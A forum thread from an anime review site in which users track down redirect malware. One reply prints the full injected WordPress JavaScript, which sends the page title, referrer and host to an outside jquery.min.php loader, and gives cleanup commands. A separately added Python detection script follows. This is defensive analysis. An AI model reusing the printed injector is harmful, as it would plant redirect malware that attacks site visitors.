
The Nihon Review Forum

December 14, 2017, 07:34:48 PM

Author Topic: Virus on the website?  (Read 2605 times)

Offline gotarist

  • Jr. Member
  • **
  • Posts: 22

Virus on the website?
« on: December 26, 2015, 09:07:13 PM »
Whenever I visit the website recently, it automatically re-directs me to some kind of pop-up ad and avast goes crazy.  Would you know anything about this?

Offline Kaikyaku

  • Reviewer
  • Jr. Member
  • *****
  • Posts: 65

Re: Virus on the website?
« Reply #1 on: December 26, 2015, 09:25:11 PM »
Thanks for letting us know. I haven't had this happen, myself. If you see it again, would you be able to take a screencap so we can see what you mean? How are you accessing the site? Through a bookmark or from a search or directly from the URL? Also, once you close the pop-up does the site work normally? Thanks.

Offline TypicalIdiotFan

  • Banned.
  • Reviewer
  • Hero Member
  • *****
  • Posts: 7241
    • @@TypicalIdiotFan

Re: Virus on the website?
« Reply #2 on: December 26, 2015, 11:47:17 PM »
That never happens to me on any platform I use to browse Nihon Review, including mobile devices, work and home computers, and several browsers including Firefox, Chrome, and IE.

That sounds more like you've got some kind of severe malware on your computer.
I'm just like you, only smarter™.

Offline gotarist

  • Jr. Member
  • **
  • Posts: 22

Re: Virus on the website?
« Reply #3 on: December 30, 2015, 10:49:02 AM »
Seems to have gone away. If it comes back, I'll let you know.  Though, I like the idea of a severe piece of malware on my computer that only targets anime review websites :)

Thanks!

Offline The_Outsider

  • Jr. Member
  • **
  • Posts: 61
  • potatoe

Re: Virus on the website?
« Reply #4 on: December 30, 2015, 06:43:25 PM »
Happens to me on my pc too, and I also have avast.

It's fine on my iPad tho.

Offline MCAL

  • Hero Member
  • *****
  • Posts: 1229

Re: Virus on the website?
« Reply #5 on: December 30, 2015, 07:54:05 PM »
Was happening with me too. Looks like I fixed it.

Offline HuuskerDu

  • Cat-a-tonic
  • Sr. Member
  • ****
  • Posts: 679

Re: Virus on the website?
« Reply #6 on: December 30, 2015, 08:11:10 PM »
WOT reports the site is clean.
HuuskerDu at FanFiction.net.

Offline Delphinox

  • The Only Hero That Ever Dies
  • Sr. Member
  • ****
  • Posts: 500

Re: Virus on the website?
« Reply #7 on: December 30, 2015, 08:33:16 PM »
So I tried fiddling around with how I've been getting to the site: it seems that while it never seems to get me if I just go straight to the site via URL or bookmark, whenever I try to get to an old review or blog article via Google search, there will be a redirect via URL with "xmlheads" in it to a random pop-up site. It's a different site every time, but the xmlheads redirect is the constant between every instance (which is never more than the first few times I access the site via Google search, curiously enough).

I'd have a screenshot, but it's not the end destination that matters so much as the redirect, and I didn't think quickly enough to get a snapshot of the redirect URL. Kind of arbitrary and I don't know jack about site maintenance, but after doing a few quick searches on the matter, I'd guess that it might have something to do with the site's htaccess via WordPress. Annoying as hell for sure, but I just bail on the browser on the spot and haven't had any lasting ill effects from it.

Offline Reckoner

  • Reviewer
  • Sr. Member
  • *****
  • Posts: 955

Re: Virus on the website?
« Reply #8 on: December 30, 2015, 09:50:54 PM »
I reproduced this problem by first searching "Your Lie in April review" in Google. Scrolling down to the link to Nihon Review, I get a redirect to some garbage.

Offline HuuskerDu

  • Cat-a-tonic
  • Sr. Member
  • ****
  • Posts: 679

Re: Virus on the website?
« Reply #9 on: December 31, 2015, 01:58:49 AM »
Reckoner, you're right. The payload is coming from the site's WordPress 4.3.1 engine and gets injected at the bottom of the <head>:

<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);        // page title, sent as a keyword
var se_referrer = encodeURIComponent(document.referrer);         // where the visitor came from
var host = encodeURIComponent(window.location.host);             // the infected site itself
var base = "http : / /www . smithberrybarn . com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
// Only fires when there is a referrer, i.e. a visitor arriving from a search engine link
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
    document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>

This is a redirect to http : / / www . smithberrybarn . com/jquery.min.php?xxx (spaces added).  The .jquery.min is obfuscation.  The PHP will lead you back to the real Nihon site if you visit it too many times from the same IP.  I was only able to capture it from a Google link, so I'm guessing it might check for that too. 

The payload at smithberrybarn . com launches several different attack vectors in rapid succession, including sending a strangely crafted HTTP 2 response packet that I've never seen before.  It looks pretty sophisticated.

The hackers usually back-date the last mod date on their naughty PHP files, but they often forget to also roll back the creation date. Search your WP directories for any PHP files that have a creation timestamp within the past couple weeks:

cd /foo/wordpress  #  Go to your WordPress directory
find . -ctime -14 -type f -name '*.php' -print    # Find all PHP files created in the past 14 days

During your search-and-destroy mission you should temporarily stop Apache, otherwise the hacker's command-and-control site can auto-inject new .php files in your WP faster than you can delete them (think dandelions).

If you can't find the attack vector, look for a non-standard browser sig in the logs.  A common tell is "X11" with no browser name in the browser signature:
grep '\.php.*X11' *.log | grep -E -vi 'Apple|Firefox|Gecko|Opera'  # X11 but no browser name
« Last Edit: December 31, 2015, 02:31:26 AM by HuuskerDu »
HuuskerDu at FanFiction.net.
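A small triage script in the spirit of the checks above, added here as an example (it is not code from the thread or from the Nihon Review site): it flags the injected loader's markers in a page source and applies the "X11 but no browser name" log heuristic. It assumes Apache combined log format; the sample head and log lines are constructed.

```python
import re

# Markers taken from the injected <head> script quoted in the thread: the
# "jquery.min.php" loader, its referrer parameter, the c_utt tag and the referrer check.
INJECTION_MARKERS = ("jquery.min.php", "&se_referrer=", "c_utt=snt2014", "document.referrer")


def find_injection(source):
    """Return the markers present in a page or theme source; an empty list means clean."""
    return [m for m in INJECTION_MARKERS if m in source]


# Apache combined log: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"'
)
# Same browser names the grep pipeline above excludes
BROWSER_NAMES = re.compile(r"Apple|Firefox|Gecko|Opera", re.IGNORECASE)


def suspicious_requests(log_lines):
    """Heuristic from the thread: requests for .php files whose User-Agent claims X11
    but names no browser engine. Returns (ip, path, user_agent) tuples."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, _method, path, _status, _referer, ua = m.groups()
        if ".php" in path and "X11" in ua and not BROWSER_NAMES.search(ua):
            hits.append((ip, path, ua))
    return hits


# Constructed sample data (not taken from the site's real files or logs)
SAMPLE_HEAD = ('<head><title>Review</title><script>var se_referrer = encodeURIComponent(document.referrer);'
               ' var base = "http://example.invalid/js/jquery.min.php";'
               ' var n_url = base + "?default_keyword=x&se_referrer=" + se_referrer;</script></head>')
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Dec/2015:20:11:10 +0000] "GET /wp-content/themes/x/header.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [30/Dec/2015:20:12:00 +0000] "GET /index.php HTTP/1.1" 200 9001 "https://www.google.com/" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/43.0"',
    '192.0.2.9 - - [30/Dec/2015:20:13:00 +0000] "GET /style.css HTTP/1.1" 200 100 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    print("injection markers:", find_injection(SAMPLE_HEAD))
    print("suspicious requests:", suspicious_requests(SAMPLE_LOG))
```

Run it against a real theme file and access log by reading them into `find_injection` and `suspicious_requests`; the log matcher only reports lines that parse as combined format.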

Offline Kylaran

  • A Priori Impossibility
  • Administrator
  • Full Member
  • *****
  • Posts: 128

Re: Virus on the website?
« Reply #10 on: December 31, 2015, 10:13:44 AM »
Hello everyone,

Sincere apologies for the problem, and thank you very much for bringing it to our attention. In particular, the sleuthing HuuskerDu did was a huge help in finding the problem.

After about a day or two of searching around and checking files I think I've managed to fix the issue. At least, after recruiting a few people to help test I couldn't replicate the issue on my end or that of the others for the main website and blog, but please inform us again if anything else that's suspicious is found, just in case that might not have been the last of this.

Happy new year and looking forward to another wonderful year of anime with all of you!
« Last Edit: December 31, 2015, 10:26:28 AM by Kylaran »

Offline Delphinox

  • The Only Hero That Ever Dies
  • Sr. Member
  • ****
  • Posts: 500

Re: Virus on the website?
« Reply #11 on: January 02, 2016, 11:08:15 AM »
Looks like the problem's still persisting, though this time a different redirect URL pops up (not that I suspect it matters). Imgur for a picture reference if it helps at all, it's the same drill - Google search link causes a redirect, direct access via URL doesn't.

Offline Kylaran

  • A Priori Impossibility
  • Administrator
  • Full Member
  • *****
  • Posts: 128

Re: Virus on the website?
« Reply #12 on: January 02, 2016, 12:05:32 PM »
Quote from: Delphinox on January 02, 2016, 11:08:15 AM
Looks like the problem's still persisting, though this time a different redirect URL pops up (not that I suspect it matters). Imgur for a picture reference if it helps at all, it's the same drill - Google search link causes a redirect, direct access via URL doesn't.

Thanks for notifying us of this. We'll take another look at it.

Offline HuuskerDu

  • Cat-a-tonic
  • Sr. Member
  • ****
  • Posts: 679

Re: Virus on the website?
« Reply #13 on: January 02, 2016, 12:07:38 PM »
If it's any consolation you are not alone. jQuery.min.php Malware Affects Thousands of Websites.

The actual injector is script-kiddie stuff. It looks like a farm job, where an outfit like RBN (Wiki) will pay the script kiddies $1-$5 per hacked site.  RBN then forwards to malware/spam sites who pay for the 'leads'.

Most of the redirects seem to be the usual spam and malware sites and are generally low threat (unless you click on stuff obviously), but a few like that smithberrybarn site were nasty and could mess up an unpatched browser.
HuuskerDu at FanFiction.net.

Offline gotarist

  • Jr. Member
  • **
  • Posts: 22

Re: Virus on the website?
« Reply #14 on: January 02, 2016, 11:51:02 PM »
If this helps at all, here is Avast's report:

URL: http://www.nihonreview.com/themes/nihon_momen/header.png|{gzip}
Infection: JS:Injection-A [Trj]
Process: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe